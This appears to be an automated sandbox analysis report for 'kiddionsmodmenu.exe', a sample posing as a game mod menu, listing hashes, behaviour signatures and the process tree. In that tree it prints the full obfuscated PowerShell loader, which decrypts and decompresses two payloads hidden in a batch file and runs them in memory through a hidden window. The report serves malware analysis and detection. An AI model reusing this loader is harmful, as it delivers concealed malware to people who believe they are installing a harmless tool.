Resubmissions
14-05-2024 11:22
240514-ngk71sdg28 1014-05-2024 11:22
240514-ngkw9add6y 1014-05-2024 11:22
240514-ngklgsdg27 1014-05-2024 11:22
240514-ngkaqadd6w 1014-05-2024 11:22
240514-ngjzysdd6v 1014-05-2024 11:22
240514-ngjn7add6t 1014-05-2024 11:22
240514-ngh3nadd6s 1014-05-2024 11:22
240514-ngh3nadg25 1014-05-2024 11:21
240514-nghrwsdd51 1014-05-2024 11:21
240514-ngg6csdd5z 10Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
14-05-2024 11:22
Static task
static1
Behavioral task
behavioral1
Sample
kiddionsmodmenu.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
kiddionsmodmenu.exe
Resource
win7-20240215-en
Behavioral task
behavioral3
Sample
kiddionsmodmenu.exe
Resource
win10v2004-20240508-en
General
-
Target
kiddionsmodmenu.exe
-
Size
386KB
-
MD5
88e737816cc5f3e3809152c5f9dad5be
-
SHA1
56dedf42285c74795f714dbac7782a5d0e695a97
-
SHA256
6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c
-
SHA512
8d29b5606f91b953263738f03188a56a4c981a6213b53a830bd1e3975ff3d10274704df2dda957fa0b73cd8841947d6e850c6046338b8ebe9666ca895ce0eebd
-
SSDEEP
12288:hFPdfNMz0ECh63X3u+DnSmMk1B+8kxkpTD:hddFMz0EH3X39DnL3PHkxgn
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2648 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2740 wrote to memory of 2636 2740 kiddionsmodmenu.exe 28 PID 2740 wrote to memory of 2636 2740 kiddionsmodmenu.exe 28 PID 2740 wrote to memory of 2636 2740 kiddionsmodmenu.exe 28 PID 2740 wrote to memory of 2636 2740 kiddionsmodmenu.exe 28 PID 2636 wrote to memory of 2556 2636 cmd.exe 30 PID 2636 wrote to memory of 2556 2636 cmd.exe 30 PID 2636 wrote to memory of 2556 2636 cmd.exe 30 PID 2636 wrote to memory of 2556 2636 cmd.exe 30 PID 2636 wrote to memory of 2648 2636 cmd.exe 31 PID 2636 wrote to memory of 2648 2636 cmd.exe 31 PID 2636 wrote to memory of 2648 2636 cmd.exe 31 PID 2636 wrote to memory of 2648 2636 cmd.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS141D.tmp\XClient_Dealed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Local\Temp\7zS141D.tmp\XClient_Dealed.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2556
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152KB
MD50b426e8571f8d3e437b7a42e9b8fd808
SHA1986edba4c39be9edb552284dac555e2e95f68a4a
SHA2569c1a4e3a1c90d013a9465ab585ad7a9cfc378ebdbe77fc1548cb81c791e6914e
SHA512e2efb8ba96b4c11b6167f085d5545e7e4971850e3c57f76957b8a0b0e1896537d935d123de93c1ebfd3efab34139e9bf902911ba54f20ddffad21edeeb16b021